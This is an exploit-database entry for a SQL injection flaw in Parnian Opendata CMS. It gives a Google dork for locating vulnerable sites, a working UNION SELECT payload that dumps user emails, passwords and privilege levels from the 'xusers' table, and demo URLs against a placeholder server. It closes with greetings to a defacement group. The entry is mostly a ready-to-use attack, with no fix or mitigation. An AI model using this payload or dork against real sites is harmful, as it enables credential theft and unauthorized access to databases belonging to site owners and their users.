Parnian Opendata CMS SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:71666
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ###########################################################################

Exploit Title : Parnian Opendata CMS SQL Injection Vulnerability

Date : 2011-04-15 

Author : *Alexander* 

Software Link : http://www.parniansoft.com/

Test On : php

CVE : Web Applications

Google Dork : inurl:mpfn=pdview

Exploit : mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers

Demo : http://server/index.php?mpfn=pdview&id=1'

http://server/index.php?mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers